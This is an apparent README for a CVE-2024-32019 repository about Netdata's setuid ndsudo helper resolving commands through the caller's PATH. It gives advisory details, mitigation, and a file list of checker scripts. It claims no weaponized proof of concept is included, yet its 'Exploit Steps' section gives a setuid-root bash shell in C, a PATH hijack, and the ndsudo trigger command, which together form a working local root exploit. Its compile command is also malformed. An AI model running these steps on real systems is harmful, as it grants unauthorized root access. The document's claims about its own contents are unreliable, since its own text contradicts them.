来源

关联漏洞

介绍

## CVE-2024-32019 — Netdata `ndsudo` Local Privilege Escalation

### Summary

Netdata’s `ndsudo` helper (installed `setuid root`) restricts which commands it will run, but **resolves those commands using the caller’s `PATH`**. In impacted versions, a local user can place a malicious binary earlier in `PATH` and have `ndsudo` execute it with root privileges. **Patched in Netdata 1.45.3 and 1.45.0-169.**

### Affected / Patched

- **Affected:** `>= 1.44.0-60, < 1.45.0-169` and `>= 1.45.0, < 1.45.3` (per upstream advisory).
    
- **Fixed:** `1.45.3` (stable), `1.45.0-169` (nightly). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Impact

Local **privilege escalation to root** on systems where `ndsudo` is installed SUID and the user can invoke it (commonly members of the `netdata` group). [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)[GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)

### Root Cause (high-level)

- `ndsudo` is SUID-root and whitelists subcommands like `nvme-list`, `nvme-smart-log`, etc.
    
- It calls external executables by name (e.g., `nvme`), which are resolved via **`PATH`** instead of using absolute paths or a safe, fixed search.
    
- If a writable directory appears before system paths, an attacker can introduce a look-alike binary that gets executed as root. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Safe Reproduction / Verification

This repository includes **non-exploit checkers** that:

- Inspect `/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo` (or wherever installed) for SUID/ownership.
    
- Enumerate `PATH` for **writable directories** earlier than common system paths.
    
- Confirm presence of whitelisted subcommand names that `ndsudo` might try to execute.
    
- Optionally run `ndsudo --test <subcommand>` to print the resolved command **without executing it** (use with caution, read code first). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

> ⚠️ **No weaponized PoC** is included. This project is for defenders and researchers to **assess exposure** and **validate patches** responsibly.

### Mitigation

- **Upgrade** Netdata to **1.45.3** (stable) or **1.45.0-169** (nightly).
    
- As a defense-in-depth measure, prefer **absolute paths** or sanitized minimal PATH in SUID helpers; avoid granting unnecessary `ndsudo` access. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)[wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    

### Exploit Steps

###### 1. Save the following C code as `nvme.c`:

```C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

###### 2.  Compile the Exploit

```bash
gcc nvme.c - nvme
```

###### 3.  Environment Set-Up

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

###### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
```

###### 5.  Exploit Command

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
### References

- NVD: CVE-2024-32019. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
    
- Netdata Advisory (GHSA-pmhq-4cxq-wj93). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    
- Wiz summary. [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    
- Snyk write-up. [Vulnerability Guide](https://security.snyk.io/vuln/SNYK-UNMANAGED-NETDATANETDATA-6613089)
    
- MITRE/CVE listing. [CVE](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=netdata)

文件快照

 [4.0K]  /data/pocs/b9741c6f1f034447e0c514d5c0cdcdc65c65a548
├── [4.0K]  checker_c
│   └── [1.4K]  cve-2024-32019_check.c
├── [4.0K]  checker_python
│   └── [2.7K]  cve-2024-32019_check.py
└── [3.7K]  README.md

2 directories, 3 files

备注